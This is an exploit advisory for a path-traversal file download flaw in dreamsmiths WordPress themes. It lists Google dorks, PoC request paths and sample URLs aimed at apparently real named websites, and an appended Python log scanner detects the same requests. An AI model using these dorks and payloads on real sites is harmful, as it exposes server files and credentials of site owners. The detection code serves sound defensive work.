# Exploit Title: WordPress dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7, Kali

PoC:
Arbitrary PHP file download in all WordPress themes by dreamsmiths:

site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.php
site.com/wp-content/themes/optimus/download.php?file=../../../index.php
site.com/wp-content/themes/erinvale/download.php?file=../../../index.php
site.com/wp-content/themes/hsv/download.php?file=../../../index.php

Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
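
Detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web server access logs for theme-level `download.php` requests whose `file=` value traverses directories or asks for PHP source. The combined log format, the function names `classify` and `scan`, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request path shape from the PoC: a download.php directly inside a theme folder.
THEME_DOWNLOAD = re.compile(r"^/wp-content/themes/[^/]+/download\.php$", re.I)
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2018:10:00:01 +0000] "GET /wp-content/themes/hsv/download.php?file=../../../index.php HTTP/1.1" 200 418',
    '192.0.2.10 - - [08/Jan/2018:10:00:02 +0000] "GET /wp-content/themes/hsv/download.php?file=download.php HTTP/1.1" 200 912',
    '198.51.100.7 - - [08/Jan/2018:10:05:00 +0000] "GET /wp-content/themes/hsv/download.php?file=brochure.pdf HTTP/1.1" 200 48211',
    '198.51.100.9 - - [08/Jan/2018:10:06:00 +0000] "GET /wp-content/themes/hsv/download.php?file=%252e%252e%252findex.php HTTP/1.1" 200 418',
]

def classify(value):
    """Return why a file= value is suspicious, or None if it looks benign."""
    for _ in range(3):  # peel extra layers of URL encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if value.startswith("/") or ".." in value.split("/"):
        return "path traversal"
    if value.lower().endswith((".php", ".phtml", ".inc")):
        return "php source request"
    return None

def scan(lines):
    """Return (client, file value, reason, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not THEME_DOWNLOAD.match(url.path):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reason = classify(value)
            if reason:
                hits.append((line.split()[0], value, reason, m.group(2)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the handler returned a body for that request and the file served should be treated as disclosed.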